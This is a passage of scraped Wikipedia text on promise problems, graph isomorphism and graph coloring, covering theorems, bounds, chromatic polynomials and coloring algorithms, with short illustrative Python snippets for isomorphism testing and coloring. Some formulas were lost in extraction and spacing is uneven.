graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems have been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class#NP
In graph theory, an isomorphism of graphs G and H is a bijection between the vertex sets of G and H such that any two vertices u and v of G are adjacent in G if and only if f(u) and f(v) are adjacent in H. This kind of bijection is commonly described as an "edge-preserving bijection", in accordance with the general notion of isomorphism being a structure-preserving bijection. If an isomorphism exists between two graphs, then the graphs are called isomorphic and denoted as G ≃ H. In the case when the isomorphism is a mapping of a graph onto itself, i.e., when G and H are one and the same graph, the isomorphism is called an automorphism of G.

Graph isomorphism is an equivalence relation on graphs and as such it partitions the class of all graphs into equivalence classes. A set of graphs isomorphic to each other is called an isomorphism class of graphs. The question of whether graph isomorphism can be determined in polynomial time is a major unsolved problem in computer science, known as the graph isomorphism problem.[1][2]

The two graphs shown in the article's accompanying figure are isomorphic, despite their different-looking drawings; the isomorphism given there includes f(b) = 6, f(c) = 8, f(d) = 3, f(g) = 5, f(h) = 2, f(i) = 4, and f(j) = 7.

In the above definition, graphs are understood to be undirected, non-labeled, non-weighted graphs. However, the notion of isomorphism may be applied to all other variants of the notion of graph, by adding the requirements to preserve the corresponding additional elements of structure: arc directions, edge weights, etc., with the following exception.

For labeled graphs, two definitions of isomorphism are in use. Under one definition, an isomorphism is a vertex bijection which is both edge-preserving and label-preserving.[3][4] Under another definition, an isomorphism is an edge-preserving vertex bijection which preserves equivalence classes of labels, i.e., vertices with equivalent (e.g., the same) labels are mapped onto vertices with equivalent labels and vice versa; the same applies to edge labels. For example, the K2 graph with the two vertices labelled with 1 and 2 has a single automorphism under the first definition, but under the second definition there are two automorphisms.

The second definition is assumed in certain situations when graphs are endowed with unique labels commonly taken from the integer range 1,...,n, where n is the number of the vertices of the graph, used only to uniquely identify the vertices. In such cases two labeled graphs are sometimes said to be isomorphic if the corresponding underlying unlabeled graphs are isomorphic (otherwise the definition of isomorphism would be trivial).

The formal notion of "isomorphism", e.g., of "graph isomorphism", captures the informal notion that some objects have "the same structure" if one ignores individual distinctions of "atomic" components of the objects in question. Whenever individuality of "atomic" components (vertices and edges, for graphs) is important for correct representation of whatever is modeled by graphs, the model is refined by imposing additional restrictions on the structure, and other mathematical objects are used: digraphs, labeled graphs, colored graphs, rooted trees and so on. The isomorphism relation may also be defined for all these generalizations of graphs: the isomorphism bijection must preserve the elements of structure which define the object type in question: arcs, labels, vertex/edge colors, the root of the rooted tree, etc.
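The definition translates directly into a brute-force test: try every bijection between the two vertex sets and check that it preserves edges. The Python sketch below does exactly that (the graph encoding and the path example are illustrative). Since it tries up to n! bijections it is only usable on very small graphs, which is what makes the complexity of the problem, discussed below, interesting.

from itertools import permutations

def find_isomorphism(V1, E1, V2, E2):
    """Return an edge-preserving bijection V1 -> V2 as a dict, or None if none exists."""
    if len(V1) != len(V2) or len(E1) != len(E2):
        return None
    E2set = {frozenset(e) for e in E2}
    for perm in permutations(V2):
        f = dict(zip(V1, perm))                          # candidate bijection
        if all(frozenset((f[u], f[v])) in E2set for u, v in E1):
            return f                                     # every edge of G maps to an edge of H
    return None

# The path a-b-c-d and the path 1-2-3-4 are isomorphic.
print(find_isomorphism(["a", "b", "c", "d"], [("a", "b"), ("b", "c"), ("c", "d")],
                       [1, 2, 3, 4], [(1, 2), (2, 3), (3, 4)]))
# {'a': 1, 'b': 2, 'c': 3, 'd': 4}

Because the two edge lists have equal size, mapping every edge onto an edge is enough: the bijection then also maps non-edges onto non-edges.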
The notion of "graph isomorphism" allows us to distinguishgraph propertiesinherent to the structures of graphs themselves from properties associated with graph representations:graph drawings,data structures for graphs,graph labelings, etc. For example, if a graph has exactly onecycle, then all graphs in its isomorphism class also have exactly one cycle. On the other hand, in the common case when the vertices of a graph are (representedby) theintegers1, 2,...N, then the expression may be different for two isomorphic graphs. TheWhitney graph isomorphism theorem,[6]shown byHassler Whitney, states that two connected graphs are isomorphic if and only if theirline graphsare isomorphic, with a single exception:K3, thecomplete graphon three vertices, and thecomplete bipartite graphK1,3, which are not isomorphic but both haveK3as their line graph. The Whitney graph theorem can be extended tohypergraphs.[7] While graph isomorphism may be studied in a classical mathematical way, as exemplified by the Whitney theorem, it is recognized that it is a problem to be tackled with an algorithmic approach. The computational problem of determining whether two finite graphs are isomorphic is called the graph isomorphism problem. Its practical applications include primarilycheminformatics,mathematical chemistry(identification of chemical compounds), andelectronic design automation(verification of equivalence of various representations of the design of anelectronic circuit). The graph isomorphism problem is one of few standard problems incomputational complexity theorybelonging toNP, but not known to belong to either of its well-known (and, ifP ≠ NP, disjoint) subsets:PandNP-complete. It is one of only two, out of 12 total, problems listed inGarey & Johnson (1979)whose complexity remains unresolved, the other beinginteger factorization. It is however known that if the problem is NP-complete then thepolynomial hierarchycollapses to a finite level.[8] In November 2015,László Babai, a mathematician and computer scientist at the University of Chicago, claimed to have proven that the graph isomorphism problem is solvable inquasi-polynomial time.[9][10]He published preliminary versions of these results in the proceedings of the 2016Symposium on Theory of Computing,[11]and of the 2018International Congress of Mathematicians.[12]In January 2017, Babai briefly retracted the quasi-polynomiality claim and stated asub-exponential timecomplexity bound instead. He restored the original claim five days later.[13]As of 2024[update], the full journal version of Babai's paper has not yet been published. Its generalization, thesubgraph isomorphism problem, is known to be NP-complete. The main areas of research for the problem are design of fast algorithms and theoretical investigations of itscomputational complexity, both for the general problem and for special classes of graphs. TheWeisfeiler Leman graph isomorphism testcan be used to heuristically test for graph isomorphism.[14]If the test fails the two input graphs are guaranteed to be non-isomorphic. If the test succeeds the graphs may or may not be isomorphic. There are generalizations of the test algorithm that are guaranteed to detect isomorphisms, however their run time is exponential. Another well-known algorithm for graph isomorphism is the vf2 algorithm, developed by Cordella et al. in 2001.[15]The vf2 algorithm is a depth-first search algorithm that tries to build an isomorphism between two graphs incrementally. 
It uses a set of feasibility rules to prune the search space, allowing it to efficiently handle graphs with thousands of nodes. The vf2 algorithm has been widely used in various applications, such as pattern recognition, computer vision, and bioinformatics. While it has a worst-case exponential time complexity, it performs well in practice for many types of graphs.
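The colour-refinement idea behind the Weisfeiler-Leman test mentioned above can be sketched compactly: repeatedly relabel each vertex by its current colour together with the multiset of its neighbours' colours. If the two graphs end up with different colour histograms they are certainly non-isomorphic; if the histograms agree, the test is inconclusive. The following Python sketch is a simplified 1-dimensional version with illustrative graph encodings, not a faithful rendering of any particular implementation.

def wl_colours(adj, rounds=None):
    """1-dimensional colour refinement; returns the sorted final colour histogram."""
    colours = {v: 0 for v in adj}                       # start with a uniform colouring
    for _ in range(rounds or len(adj)):
        signature = {v: (colours[v], tuple(sorted(colours[u] for u in adj[v])))
                     for v in adj}
        relabel = {sig: i for i, sig in enumerate(sorted(set(signature.values())))}
        colours = {v: relabel[signature[v]] for v in adj}
    return sorted(colours.values())

path = {1: [2], 2: [1, 3], 3: [2, 4], 4: [3]}           # path on 4 vertices
star = {1: [2, 3, 4], 2: [1], 3: [1], 4: [1]}           # star on 4 vertices
print(wl_colours(path) == wl_colours(star))             # False: provably non-isomorphic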
https://en.wikipedia.org/wiki/Graph_isomorphism
In graph theory, graph coloring is a methodic assignment of labels traditionally called "colors" to elements of a graph. The assignment is subject to certain constraints, such as that no two adjacent elements have the same color. Graph coloring is a special case of graph labeling. In its simplest form, it is a way of coloring the vertices of a graph such that no two adjacent vertices are of the same color; this is called a vertex coloring. Similarly, an edge coloring assigns a color to each edge so that no two adjacent edges are of the same color, and a face coloring of a planar graph assigns a color to each face (or region) so that no two faces that share a boundary have the same color.

Vertex coloring is often used to introduce graph coloring problems, since other coloring problems can be transformed into a vertex coloring instance. For example, an edge coloring of a graph is just a vertex coloring of its line graph, and a face coloring of a plane graph is just a vertex coloring of its dual. However, non-vertex coloring problems are often stated and studied as-is. This is partly pedagogical, and partly because some problems are best studied in their non-vertex form, as in the case of edge coloring.

The convention of using colors originates from coloring the countries in a political map, where each face is literally colored. This was generalized to coloring the faces of a graph embedded in the plane. By planar duality it became coloring the vertices, and in this form it generalizes to all graphs. In mathematical and computer representations, it is typical to use the first few positive or non-negative integers as the "colors". In general, one can use any finite set as the "color set". The nature of the coloring problem depends on the number of colors but not on what they are.

Graph coloring enjoys many practical applications as well as theoretical challenges. Beside the classical types of problems, different limitations can also be set on the graph, or on the way a color is assigned, or even on the color itself. It has even reached popularity with the general public in the form of the popular number puzzle Sudoku. Graph coloring is still a very active field of research. Note: Many terms used in this article are defined in Glossary of graph theory.

The first results about graph coloring deal almost exclusively with planar graphs in the form of map coloring. While trying to color a map of the counties of England, Francis Guthrie postulated the four color conjecture, noting that four colors were sufficient to color the map so that no regions sharing a common border received the same color. Guthrie's brother passed on the question to his mathematics teacher Augustus De Morgan at University College, who mentioned it in a letter to William Hamilton in 1852. Arthur Cayley raised the problem at a meeting of the London Mathematical Society in 1879. The same year, Alfred Kempe published a paper that claimed to establish the result, and for a decade the four color problem was considered solved. For his accomplishment Kempe was elected a Fellow of the Royal Society and later President of the London Mathematical Society.[1]

In 1890, Percy John Heawood pointed out that Kempe's argument was wrong. However, in that paper he proved the five color theorem, saying that every planar map can be colored with no more than five colors, using ideas of Kempe.
In the following century, a vast amount of work was done and theories were developed to reduce the number of colors to four, until the four color theorem was finally proved in 1976 byKenneth AppelandWolfgang Haken. The proof went back to the ideas of Heawood and Kempe and largely disregarded the intervening developments.[2]The proof of the four color theorem is noteworthy, aside from its solution of a century-old problem, for being the first major computer-aided proof. In 1912,George David Birkhoffintroduced thechromatic polynomialto study the coloring problem, which was generalised to theTutte polynomialbyW. T. Tutte, both of which are important invariants inalgebraic graph theory. Kempe had already drawn attention to the general, non-planar case in 1879,[3]and many results on generalisations of planar graph coloring to surfaces of higher order followed in the early 20th century. In 1960,Claude Bergeformulated another conjecture about graph coloring, thestrong perfect graph conjecture, originally motivated by aninformation-theoreticconcept called thezero-error capacityof a graph introduced byShannon. The conjecture remained unresolved for 40 years, until it was established as the celebratedstrong perfect graph theorembyChudnovsky,Robertson,Seymour, andThomasin 2002. Graph coloring has been studied as an algorithmic problem since the early 1970s: the chromatic number problem (see section§ Vertex coloringbelow) is one ofKarp's 21 NP-complete problemsfrom 1972, and at approximately the same time various exponential-time algorithms were developed based on backtracking and on the deletion-contraction recurrence ofZykov (1949). One of the major applications of graph coloring,register allocationin compilers, was introduced in 1981. When used without any qualification, acoloringof a graph almost always refers to aproper vertex coloring, namely a labeling of the graph's vertices with colors such that no two vertices sharing the sameedgehave the same color. Since a vertex with aloop(i.e. a connection directly back to itself) could never be properly colored, it is understood that graphs in this context are loopless. The terminology of usingcolorsfor vertex labels goes back to map coloring. Labels likeredandblueare only used when the number of colors is small, and normally it is understood that the labels are drawn from theintegers{1, 2, 3, ...}. A coloring using at mostkcolors is called a (proper)k-coloring. The smallest number of colors needed to color a graphGis called itschromatic number, and is often denotedχ(G).[4]Sometimesγ(G)is used, sinceχ(G)is also used to denote theEuler characteristicof a graph.[5]A graph that can be assigned a (proper)k-coloring isk-colorable, and it isk-chromaticif its chromatic number is exactlyk. A subset of vertices assigned to the same color is called acolor class; every such class forms anindependent set. Thus, ak-coloring is the same as a partition of the vertex set intokindependent sets, and the termsk-partiteandk-colorablehave the same meaning. Thechromatic polynomialcounts the number of ways a graph can be colored using some of a given number of colors. For example, using three colors, the graph in the adjacent image can be colored in 12 ways. With only two colors, it cannot be colored at all. With four colors, it can be colored in 24 + 4 × 12 = 72 ways: using all four colors, there are 4! 
= 24 valid colorings (every assignment of four colors to any 4-vertex graph is a proper coloring); and for every choice of three of the four colors, there are 12 valid 3-colorings. So, for the graph in the example, a table of the number of valid colorings would start like this:

Available colors: 1, 2, 3, 4
Number of colorings: 0, 0, 12, 72

The chromatic polynomial is a function P(G, t) that counts the number of t-colorings of G. As the name indicates, for a given G the function is indeed a polynomial in t. For the example graph, P(G, t) = t(t − 1)²(t − 2), and indeed P(G, 4) = 72. The chromatic polynomial includes more information about the colorability of G than does the chromatic number. Indeed, χ is the smallest positive integer that is not a zero of the chromatic polynomial: χ(G) = min{k : P(G, k) > 0}.

An edge coloring of a graph is a proper coloring of the edges, meaning an assignment of colors to edges so that no vertex is incident to two edges of the same color. An edge coloring with k colors is called a k-edge-coloring and is equivalent to the problem of partitioning the edge set into k matchings. The smallest number of colors needed for an edge coloring of a graph G is the chromatic index, or edge chromatic number, χ′(G). A Tait coloring is a 3-edge coloring of a cubic graph. The four color theorem is equivalent to the assertion that every planar cubic bridgeless graph admits a Tait coloring.

Total coloring is a type of coloring on the vertices and edges of a graph. When used without any qualification, a total coloring is always assumed to be proper in the sense that no adjacent vertices, no adjacent edges, and no edge and its end-vertices are assigned the same color. The total chromatic number χ″(G) of a graph G is the fewest colors needed in any total coloring of G.

For a graph with a strong embedding on a surface, the face coloring is the dual of the vertex coloring problem. For a graph G with a strong embedding on an orientable surface, William T. Tutte[6][7][8] discovered that if the graph is k-face-colorable then G admits a nowhere-zero k-flow. The equivalence holds if the surface is a sphere.

An unlabeled coloring of a graph is an orbit of a coloring under the action of the automorphism group of the graph. The colors remain labeled; it is the graph that is unlabeled. There is an analogue of the chromatic polynomial which counts the number of unlabeled colorings of a graph from a given finite color set. If we interpret a coloring of a graph on d vertices as a vector in Z^d, the action of an automorphism is a permutation of the coefficients in the coloring vector.

Assigning distinct colors to distinct vertices always yields a proper coloring, so χ(G) ≤ n. The only graphs that can be 1-colored are edgeless graphs. A complete graph K_n of n vertices requires χ(K_n) = n colors. In an optimal coloring there must be at least one of the graph's m edges between every pair of color classes, so χ(G)(χ(G) − 1) ≤ 2m. More generally, a family F of graphs is χ-bounded if there is some function c such that the graphs G in F can be colored with at most c(ω(G)) colors, where ω(G) is the clique number of G. For the family of the perfect graphs this function is c(ω(G)) = ω(G). The 2-colorable graphs are exactly the bipartite graphs, including trees and forests. By the four color theorem, every planar graph can be 4-colored.
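For small graphs, the chromatic polynomial discussed above can be evaluated directly by brute force, simply counting the proper colorings. The Python sketch below uses an illustrative graph chosen to have the same polynomial t(t − 1)²(t − 2) as the worked example, and it also recovers χ(G) as the smallest positive k with P(G, k) > 0.

from itertools import product

def count_colourings(vertices, edges, t):
    """P(G, t) by brute force: the number of proper colourings with t colours."""
    index = {v: i for i, v in enumerate(vertices)}
    return sum(1 for col in product(range(t), repeat=len(vertices))
               if all(col[index[u]] != col[index[v]] for u, v in edges))

V = ["a", "b", "c", "d"]
E = [("a", "b"), ("b", "c"), ("c", "a"), ("c", "d")]      # a triangle plus a pendant vertex
print([count_colourings(V, E, t) for t in (1, 2, 3, 4)])  # [0, 0, 12, 72]
chi = next(k for k in range(1, len(V) + 1) if count_colourings(V, E, k) > 0)
print(chi)                                                # 3, the chromatic number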
A greedy coloring shows that every graph can be colored with one more color than the maximum vertex degree: χ(G) ≤ Δ(G) + 1. Complete graphs have χ(G) = n and Δ(G) = n − 1, and odd cycles have χ(G) = 3 and Δ(G) = 2, so for these graphs this bound is best possible. In all other cases, the bound can be slightly improved; Brooks' theorem[9] states that a connected graph that is neither a complete graph nor an odd cycle satisfies χ(G) ≤ Δ(G).

Several lower bounds for the chromatic number have been discovered over the years:

If G contains a clique of size k, then at least k colors are needed to color that clique; in other words, the chromatic number is at least the clique number: χ(G) ≥ ω(G). For perfect graphs this bound is tight. Finding cliques is known as the clique problem.

Hoffman's bound: Let W be a real symmetric matrix such that W_{i,j} = 0 whenever (i,j) is not an edge in G. Define χ_W(G) = 1 − λ_max(W)/λ_min(W), where λ_max(W), λ_min(W) are the largest and smallest eigenvalues of W. Define χ_H(G) = max_W χ_W(G), with W as above. Then: χ_H(G) ≤ χ(G).

Vector chromatic number: Let W be a positive semi-definite matrix such that W_{i,j} ≤ −1/(k − 1) whenever (i,j) is an edge in G. Define χ_V(G) to be the least k for which such a matrix W exists. Then χ_V(G) ≤ χ(G).

Lovász number: The Lovász number of the complementary graph is also a lower bound on the chromatic number: ϑ(Ḡ) ≤ χ(G).

Fractional chromatic number: The fractional chromatic number of a graph is a lower bound on the chromatic number as well: χ_f(G) ≤ χ(G).

These bounds are ordered as follows: Graphs with large cliques have a high chromatic number, but the opposite is not true. The Grötzsch graph is an example of a 4-chromatic graph without a triangle, and the example can be generalized to the Mycielskians. To prove this, Mycielski and Zykov each gave a construction of an inductively defined family of triangle-free graphs with arbitrarily large chromatic number.[11] Burling (1965) constructed axis-aligned boxes in R³ whose intersection graph is triangle-free and requires arbitrarily many colors to be properly colored. This family of graphs is then called the Burling graphs. The same class of graphs is used for the construction of a family of triangle-free line segments in the plane, given by Pawlik et al. (2014).[12] It shows that the chromatic number of its intersection graph is arbitrarily large as well. Hence, this implies that axis-aligned boxes in R³ as well as line segments in R² are not χ-bounded.[12]

From Brooks's theorem, graphs with high chromatic number must have high maximum degree. But colorability is not an entirely local phenomenon: a graph with high girth looks locally like a tree, because all cycles are long, but its chromatic number need not be 2; there exist graphs of arbitrarily high girth and arbitrarily high chromatic number.

An edge coloring of G is a vertex coloring of its line graph L(G), and vice versa. Thus χ′(G) = χ(L(G)). There is a strong relationship between edge colorability and the graph's maximum degree Δ(G).
Since all edges incident to the same vertex need their own color, we have χ′(G) ≥ Δ(G). Moreover, χ′(G) = Δ(G) when G is bipartite (Kőnig's theorem). In general, the relationship is even stronger than what Brooks's theorem gives for vertex coloring: by Vizing's theorem, Δ(G) ≤ χ′(G) ≤ Δ(G) + 1.

A graph has a k-coloring if and only if it has an acyclic orientation for which the longest path has at most k vertices; this is the Gallai–Hasse–Roy–Vitaver theorem (Nešetřil & Ossona de Mendez 2012). For planar graphs, vertex colorings are essentially dual to nowhere-zero flows.

About infinite graphs, much less is known. Among the few results on infinite graph coloring is the De Bruijn–Erdős theorem, which states (assuming the axiom of choice) that an infinite graph is k-colorable if and only if every finite subgraph is k-colorable.

As stated above, ω(G) ≤ χ(G) ≤ Δ(G) + 1. A conjecture of Reed from 1998 is that the value is essentially closer to the lower bound: χ(G) ≤ ⌈(ω(G) + Δ(G) + 1)/2⌉.

The chromatic number of the plane, where two points are adjacent if they have unit distance, is unknown, although it is one of 5, 6, or 7. Other open problems concerning the chromatic number of graphs include the Hadwiger conjecture stating that every graph with chromatic number k has a complete graph on k vertices as a minor, the Erdős–Faber–Lovász conjecture bounding the chromatic number of unions of complete graphs that have at most one vertex in common to each pair, and the Albertson conjecture that among k-chromatic graphs the complete graphs are the ones with smallest crossing number.

When Birkhoff and Lewis introduced the chromatic polynomial in their attack on the four-color theorem, they conjectured that for planar graphs G, the polynomial P(G, t) has no zeros in the region [4, ∞). Although it is known that such a chromatic polynomial has no zeros in the region [5, ∞) and that P(G, 4) ≠ 0, their conjecture is still unresolved. It also remains an unsolved problem to characterize graphs which have the same chromatic polynomial and to determine which polynomials are chromatic.

Determining if a graph can be colored with 2 colors is equivalent to determining whether or not the graph is bipartite, and thus computable in linear time using breadth-first search or depth-first search. More generally, the chromatic number and a corresponding coloring of perfect graphs can be computed in polynomial time using semidefinite programming. Closed formulas for chromatic polynomials are known for many classes of graphs, such as forests, chordal graphs, cycles, wheels, and ladders, so these can be evaluated in polynomial time. If the graph is planar and has low branch-width (or is nonplanar but with a known branch-decomposition), then it can be solved in polynomial time using dynamic programming. In general, the time required is polynomial in the graph size, but exponential in the branch-width.

Brute-force search for a k-coloring considers each of the k^n assignments of k colors to n vertices and checks for each whether it is legal. To compute the chromatic number and the chromatic polynomial, this procedure is used for every k = 1, …, n − 1, which is impractical for all but the smallest input graphs. Using dynamic programming and a bound on the number of maximal independent sets, k-colorability can be decided in time and space O(2.4423^n).[15] Using the principle of inclusion–exclusion and Yates's algorithm for the fast zeta transform, k-colorability can be decided in time O(2^n n)[14][16][17][18] for any k.
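As a concrete (and deliberately impractical) illustration of the brute-force search just described, the sketch below enumerates all k^n color assignments and derives the chromatic number by trying k = 1, 2, …; the graph encoding is an assumption chosen for brevity.

```python
from itertools import product

def is_k_colorable(n, edges, k):
    """Brute-force check over all k**n color assignments, as in the text."""
    return any(
        all(c[u] != c[v] for u, v in edges)
        for c in product(range(k), repeat=n)
    )

def chromatic_number(n, edges):
    """Smallest k admitting a proper k-coloring; feasible only for tiny graphs."""
    k = 1
    while not is_k_colorable(n, edges, k):
        k += 1
    return k

# Example: an odd cycle C5 needs 3 colors.
print(chromatic_number(5, [(i, (i + 1) % 5) for i in range(5)]))  # 3
```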
Faster algorithms are known for 3- and 4-colorability, which can be decided in timeO(1.3289n){\displaystyle O(1.3289^{n})}[19]andO(1.7272n){\displaystyle O(1.7272^{n})},[20]respectively. Exponentially faster algorithms are also known for 5- and 6-colorability, as well as for restricted families of graphs, including sparse graphs.[21] ThecontractionG/uv{\displaystyle G/uv}of a graphGis the graph obtained by identifying the verticesuandv, and removing any edges between them. The remaining edges originally incident touorvare now incident to their identification (i.e., the new fused nodeuv). This operation plays a major role in the analysis of graph coloring. The chromatic number satisfies therecurrence relation: due toZykov (1949), whereuandvare non-adjacent vertices, andG+uv{\displaystyle G+uv}is the graph with the edgeuvadded. Several algorithms are based on evaluating this recurrence and the resulting computation tree is sometimes called a Zykov tree. The running time is based on a heuristic for choosing the verticesuandv. The chromatic polynomial satisfies the following recurrence relation whereuandvare adjacent vertices, andG−uv{\displaystyle G-uv}is the graph with the edgeuvremoved.P(G−uv,k){\displaystyle P(G-uv,k)}represents the number of possible proper colorings of the graph, where the vertices may have the same or different colors. Then the proper colorings arise from two different graphs. To explain, if the verticesuandvhave different colors, then we might as well consider a graph whereuandvare adjacent. Ifuandvhave the same colors, we might as well consider a graph whereuandvare contracted. Tutte's curiosity about which other graph properties satisfied this recurrence led him to discover a bivariate generalization of the chromatic polynomial, theTutte polynomial. These expressions give rise to a recursive procedure called thedeletion–contraction algorithm, which forms the basis of many algorithms for graph coloring. The running time satisfies the same recurrence relation as theFibonacci numbers, so in the worst case the algorithm runs in time within a polynomial factor of(1+52)n+m=O(1.6180n+m){\displaystyle \left({\tfrac {1+{\sqrt {5}}}{2}}\right)^{n+m}=O(1.6180^{n+m})}fornvertices andmedges.[22]The analysis can be improved to within a polynomial factor of the numbert(G){\displaystyle t(G)}ofspanning treesof the input graph.[23]In practice,branch and boundstrategies andgraph isomorphismrejection are employed to avoid some recursive calls. The running time depends on the heuristic used to pick the vertex pair. Thegreedy algorithmconsiders the vertices in a specific orderv1{\displaystyle v_{1}}, ...,vn{\displaystyle v_{n}}and assigns tovi{\displaystyle v_{i}}the smallest available color not used byvi{\displaystyle v_{i}}'s neighbours amongv1{\displaystyle v_{1}}, ...,vi−1{\displaystyle v_{i-1}}, adding a fresh color if needed. The quality of the resulting coloring depends on the chosen ordering. There exists an ordering that leads to a greedy coloring with the optimal number ofχ(G){\displaystyle \chi (G)}colors. On the other hand, greedy colorings can be arbitrarily bad; for example, thecrown graphonnvertices can be 2-colored, but has an ordering that leads to a greedy coloring withn/2{\displaystyle n/2}colors. 
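The following sketch implements the greedy algorithm just described and reproduces the crown-graph behaviour mentioned above: one vertex ordering yields 2 colors, another yields n/2. The concrete labelling of the crown graph is an assumption made for the example.

```python
def greedy_coloring(adj, order):
    """Assign each vertex (in the given order) the smallest color not used
    by its already-colored neighbours."""
    color = {}
    for v in order:
        used = {color[u] for u in adj[v] if u in color}
        c = 0
        while c in used:
            c += 1
        color[v] = c
    return color

# Crown graph on 6 vertices: complete bipartite K_{3,3} minus a perfect matching.
left, right = [0, 1, 2], [3, 4, 5]
adj = {v: set() for v in left + right}
for i in left:
    for j in right:
        if j - 3 != i:                 # omit the matching edges (0,3),(1,4),(2,5)
            adj[i].add(j)
            adj[j].add(i)

good = left + right                    # one side first: 2 colors
bad = [0, 3, 1, 4, 2, 5]               # interleaved: n/2 = 3 colors
print(max(greedy_coloring(adj, good).values()) + 1)   # 2
print(max(greedy_coloring(adj, bad).values()) + 1)    # 3
```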
Forchordal graphs, and for special cases of chordal graphs such asinterval graphsandindifference graphs, the greedy coloring algorithm can be used to find optimal colorings in polynomial time, by choosing the vertex ordering to be the reverse of aperfect elimination orderingfor the graph. Theperfectly orderable graphsgeneralize this property, but it is NP-hard to find a perfect ordering of these graphs. If the vertices are ordered according to theirdegrees, the resulting greedy coloring uses at mostmaximin{d(xi)+1,i}{\displaystyle {\text{max}}_{i}{\text{ min}}\{d(x_{i})+1,i\}}colors, at most one more than the graph's maximum degree. This heuristic is sometimes called the Welsh–Powell algorithm.[24]Another heuristic due toBrélazestablishes the ordering dynamically while the algorithm proceeds, choosing next the vertex adjacent to the largest number of different colors.[25]Many other graph coloring heuristics are similarly based on greedy coloring for a specific static or dynamic strategy of ordering the vertices, these algorithms are sometimes calledsequential coloringalgorithms. The maximum (worst) number of colors that can be obtained by the greedy algorithm, by using a vertex ordering chosen to maximize this number, is called theGrundy numberof a graph. Two well-known polynomial-time heuristics for graph colouring are theDSaturandrecursive largest first(RLF) algorithms. Similarly to thegreedy colouring algorithm, DSatur colours theverticesof agraphone after another, expending a previously unused colour when needed. Once a newvertexhas been coloured, the algorithm determines which of the remaining uncoloured vertices has the highest number of different colours in its neighbourhood and colours this vertex next. This is defined as thedegree of saturationof a given vertex. Therecursive largest first algorithmoperates in a different fashion by constructing each color class one at a time. It does this by identifying amaximal independent setof vertices in the graph using specialised heuristic rules. It then assigns these vertices to the same color and removes them from the graph. These actions are repeated on the remaining subgraph until no vertices remain. The worst-case complexity of DSatur isO(n2){\displaystyle O(n^{2})}, wheren{\displaystyle n}is the number of vertices in the graph. The algorithm can also be implemented using a binary heap to store saturation degrees, operating inO((n+m)log⁡n){\displaystyle O((n+m)\log n)}wherem{\displaystyle m}is the number of edges in the graph.[26]This produces much faster runs with sparse graphs. The overall complexity of RLF is slightly higher thanDSaturatO(mn){\displaystyle O(mn)}.[26] DSatur and RLF areexactforbipartite,cycle, andwheel graphs.[26] It is known that aχ-chromatic graph can bec-colored in the deterministic LOCAL model, inO(n1/α){\displaystyle O(n^{1/\alpha })}. rounds, withα=⌊c−1χ−1⌋{\displaystyle \alpha =\left\lfloor {\frac {c-1}{\chi -1}}\right\rfloor }. A matching lower bound ofΩ(n1/α){\displaystyle \Omega (n^{1/\alpha })}rounds is also known. This lower bound holds even if quantum computers that can exchange quantum information, possibly with a pre-shared entangled state, are allowed. In the field ofdistributed algorithms, graph coloring is closely related to the problem ofsymmetry breaking. The current state-of-the-art randomized algorithms are faster for sufficiently large maximum degree Δ than deterministic algorithms. 
The fastest randomized algorithms employ themulti-trials techniqueby Schneider and Wattenhofer.[27] In asymmetric graph, adeterministicdistributed algorithm cannot find a proper vertex coloring. Some auxiliary information is needed in order to break symmetry. A standard assumption is that initially each node has aunique identifier, for example, from the set {1, 2, ...,n}. Put otherwise, we assume that we are given ann-coloring. The challenge is toreducethe number of colors fromnto, e.g., Δ + 1. The more colors are employed, e.g.O(Δ) instead of Δ + 1, the fewer communication rounds are required.[27] A straightforward distributed version of the greedy algorithm for (Δ + 1)-coloring requires Θ(n) communication rounds in the worst case – information may need to be propagated from one side of the network to another side. The simplest interesting case is ann-cycle. Richard Cole andUzi Vishkin[28]show that there is a distributed algorithm that reduces the number of colors fromntoO(logn) in one synchronous communication step. By iterating the same procedure, it is possible to obtain a 3-coloring of ann-cycle inO(log*n) communication steps (assuming that we have unique node identifiers). The functionlog*,iterated logarithm, is an extremely slowly growing function, "almost constant". Hence the result by Cole and Vishkin raised the question of whether there is aconstant-timedistributed algorithm for 3-coloring ann-cycle.Linial (1992)showed that this is not possible: any deterministic distributed algorithm requires Ω(log*n) communication steps to reduce ann-coloring to a 3-coloring in ann-cycle. The technique by Cole and Vishkin can be applied in arbitrary bounded-degree graphs as well; the running time is poly(Δ) +O(log*n).[29]The technique was extended tounit disk graphsby Schneider and Wattenhofer.[30]The fastest deterministic algorithms for (Δ + 1)-coloring for small Δ are due to Leonid Barenboim, Michael Elkin and Fabian Kuhn.[31]The algorithm by Barenboim et al. runs in timeO(Δ) +log*(n)/2, which is optimal in terms ofnsince the constant factor 1/2 cannot be improved due to Linial's lower bound.Panconesi & Srinivasan (1996)use network decompositions to compute a Δ+1 coloring in time2O(log⁡n){\displaystyle 2^{O\left({\sqrt {\log n}}\right)}}. The problem of edge coloring has also been studied in the distributed model.Panconesi & Rizzi (2001)achieve a (2Δ − 1)-coloring inO(Δ +log*n) time in this model. The lower bound for distributed vertex coloring due toLinial (1992)applies to the distributed edge coloring problem as well. Decentralized algorithms are ones where nomessage passingis allowed (in contrast to distributed algorithms where local message passing takes places), and efficient decentralized algorithms exist that will color a graph if a proper coloring exists. These assume that a vertex is able to sense whether any of its neighbors are using the same color as the vertex i.e., whether a local conflict exists. This is a mild assumption in many applications e.g. in wireless channel allocation it is usually reasonable to assume that a station will be able to detect whether other interfering transmitters are using the same channel (e.g. by measuring the SINR). This sensing information is sufficient to allow algorithms based on learning automata to find a proper graph coloring with probability one.[32] Graph coloring is computationally hard. It isNP-completeto decide if a given graph admits ak-coloring for a givenkexcept for the casesk∈ 